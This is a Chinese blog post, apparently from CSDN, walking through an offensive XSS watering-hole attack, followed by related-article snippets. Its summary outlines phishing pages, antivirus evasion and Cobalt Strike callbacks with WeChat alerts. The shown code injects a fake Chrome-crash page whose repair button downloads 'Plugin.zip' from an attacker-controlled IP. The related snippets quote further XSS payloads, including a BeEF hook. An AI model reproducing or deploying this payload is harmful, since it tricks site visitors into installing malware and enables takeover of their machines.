XSS完整利用过程

最新推荐文章于 2024-08-03 23:00:16 发布
最新推荐文章于 2024-08-03 23:00:16 发布
阅读量669 收藏
点赞数
分类专栏: 安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39811856/article/details/117033086
版权
本文介绍了XSS攻击的全利用过程,包括利用JavaScript创建诱导页面进行钓鱼,采用反序列化和分离技术实现免杀,并通过特定CS插件实现上线通知与自动收杆功能,以企业微信接收上线用户IP。
摘要由CSDN通过智能技术生成

XSS,wiki的解释是一种代码注入,所以能做的事情很多,不限于alert弹框(感觉很多人以为XSS就是弹框框,弹不出来就不认)、窃取Cookie之类的操作,下面要实现的水坑攻击就是一种利用。

过程:


1.利用JS写一个诱导页面,不要再用flash更新页面了,都被人家玩剩很多年了...

我写了个页面,抛砖引玉,一个是模仿chrome浏览器崩溃后的页面,另一个是使用layer的弹窗页面。

代码一,chrome浏览器崩溃页面:

var body = document.body;
    var _left =  window.innerWidth * 0.3 + 'px';
    var _top = window.innerHeight * 0.3 + 'px';
    var _height = window.innerHeight
    body.innerHTML=`<div style="background-color: white;height: ${_height}px"><div style='position:absolute;top:${_top};left:${_left};height:300px;width:600px;'><img src='http://39.*.*.*/sdp.png' style='margin:3px;'>
          <p><h3 >喔唷,崩溃啦!</h3></p >
          <p style='color:gray'>显示此网页时出了点问题,请在您的页面上启用显示插件,从而可能会有所帮助。</br></p >
          <a href='http://39.105.*.*/Plugin.zip'>
          <button style='margin-left:85%;height:30px;line-hight:30px;outline:none;border:none;background-color:rgb(26,115,232);color:white'  >立即修复</button></a>
        </div></div>
        `

效果图一:

最低0.47元/天 解锁文章
ATOM_123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS总结
weixin_51356351的博客
11-19 1574
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
XSS利用
YIN_XIAOMAO的博客
05-29 300
XSS利用方式较多,多研究总有一个适合你,XSS防御方式较多,多种方式联动防御才好。
xss漏洞(三,xss进阶利用
2302_80280669的博客
08-03 673
假如dvwa是你常用的网站,并且已经登录,你不知道此页面存在xss注入,黑客利用xss漏洞获取你cookie.他先打开此网站,构造了恶意语句,然后拿到URL,把URL进行包装,最后发给受害者你,你作为受害者一点击,自己的cookie就发送到了黑客特定的的文件里,黑客就拿到了你的cookie。本段代码的整体含义为:插入地址为1的图片,若无法执行(报错),便执行弹窗为‘hello’的操作。标签是将一张图嵌入的意思,src=后跟所嵌入的图片地址,onError=后跟若前面的代码无法执行所进行的操作。
XSS学习笔记(四)-漏洞利用过程
byteway的专栏
04-23 5270
setTimeout("window.location.href ='http://www.discuz.net/./a'; alert(document.cookie);a='';", 3000); 1.在这个例子(现在早已补)中希望大家也要体会到:XSS的上下文比较重要,如何根据上下文,利用未过滤的字符,合理的构造,才是成功的关键(要有足够猥琐的思路) http://www.discu
XSS利用方式
u011215939的博客
01-16 9023
前言 学习XSS注入很久了,XSS主要的情况三分天下:反射型、存储型、DOM型;今天要研究的是XSS利用,曾经有人问我XSS怎么利用的,我也只知道XSS在网页中嵌入代码,获取目标IP、Cookie,但是从来没有实践过,今天浏览FreeBuf时,发现一篇XSS利用文章,哈哈哈……于是乎,实践一下…… 准备 为了获取目标IP及ookie,实践开始之前,需要准备一个东西:VPS
xss 基本使用
sgear
04-15 1535
 下面我就分两个部分分析XSS原理: 一、XSS的触发条件 了解XSS的触发条件就先得从HTML(超文本标记语言)开始,我们浏览的网页全部都是基于超文本标记语言创建的,如显示一个超链接: http://blog.csdn.net/sgear">sgear blog 而XSS的原理也就是往HTML中注入脚本,HTML指定了脚本标记.在没有过滤字符的情况下,只需要保持完整无错的脚本标记即可触发XS
XSS介绍及利用
世间繁华梦一出
11-27 3480
XSS——跨站脚本攻击XSS介绍及利用 XSS介绍及利用 1、XSS介绍 XSS(cross site scripting)跨站脚本攻击, 恶意攻击者往web页面里插入恶意script代码,当用户浏览该页面时,代码就会被执行 2、XSS原理 在HTML中常用到字符实体,对常用到的字符实体没有进行转译,导致完整的标签出现,在可输入的文本框等某些区域内输入特定的某些标签导致代码被恶意篡改。 3、实现过程 (1)攻击者将恶意代码插入到服务器 (2)其他用户无防备的情况下访问服务器 (3)服务器对含有恶意代码的网页
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1615
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
XSS漏洞攻击过程
聚鼎安全
01-20 758
目录反射型XSS漏洞存储型XSS漏洞XSS总结 反射型XSS漏洞 Alice经常浏览某个网站,此网站为Bob所拥有。Bob的站点需要Alice使用用户名/密码进行登录,并存储了Alice敏感信息(比如银行帐户信息)。 Tom 发现 Bob的站点存在反射性的XSS漏洞 Tom 利用Bob网站的反射型XSS漏洞编写了一个exp,成链接的形式,并利用各种手段诱使Alice点击 Alice在登录到Bob的站点后,浏览了 Tom 提供的恶意链接 嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行。此脚本盗窃敏感
XSS脚本攻击使用方法初级教程
11-27
XSS跨站攻击介绍,解释XSS是如何进行攻击的以及执行攻击的实例
xss安全测试流程
热门推荐
Breeze的博客
12-11 1万+
xss安全测试流程 1. xss本质 xss产生的本质只有两点,1. 对用户可控的输入内容没有进行有效的过滤;2. 将(没过滤的)用户可控内容输出回前端页面。所以xss的安全测试可以从这两方面入手。 2. 收集xss可能存在的点 由于xss利用特征,存储型xss危害最大,可以盗取用户cookie,形成蠕虫等;反射型和DOM型主要用于钓鱼。所以在关注上述两点时应遵循以下规律: 用户可控的输入在协...
搭建XSS平台——XSS工具的利用
cxrpty的博客
02-24 2426
实验一:kali下的BeEF 实验环境:kali、DVWA 实验步骤: 1、打开kali的命令行,输入:beef-xs,获得一个js脚本,并跳出beef登录界面,输入用户名和密码(默认都是beef) 2、输入ifconfig查看ip,复制js代码,并将ip改为本机ip,此时js代码如下: <script src="http://192.168.1.106:3000/hook....
XSS漏洞的利用
LizePing_的博客
07-29 5023
XSS利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookie是xss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
XSS详解及其利用方式
读书 买花 长大
11-14 3976
XSS-xss
xss原理及利用
MAPLE102424的博客
05-12 1398
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。当别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
XSS利用之一看就懂
qq_42743187的博客
01-31 446
xss利用方法之前,先分享一个前几天友情测试的案例吧 一、XSS案例 站点就不说了,图片打码,主要看效果就可以了???? 页面上有个搜索框,输入随机值在标签中输出,不允许输入尖括号,页面会直接显示错误,但双引号可以使用 " οnclick="alert(1),直接测试,查看页面源代码发现一个问题: 就是我输入的英文小括号,输出时变成了中文括号,这样alert()函数就执行不了了。。。 于是想到,用反引号来代替小括号试试,成功弹窗,源代码显示如下: 但是这里又存在一个问题,反引号里的内容会被当成字符串处
05. XSS漏洞利用
weixin_43909650的博客
12-17 905
2022网安冬令营(web安全/渗透测试/实战训练)——蚁景网安 https://ke.qq.com/course/5874132#term_id=106089914
sqli xss xxe漏洞及其利用
最新发布
08-17
三种常见的Web应用程序漏洞分别是SQL注入(SQLi)、跨站脚本攻击(XSS),以及XML外部实体(XXE)攻击,它们分别针对的是后端数据库、前端客户端和XML解析过程中的安全问题。 1. **SQL注入 (SQLi)**: 攻击者通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATOM_123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值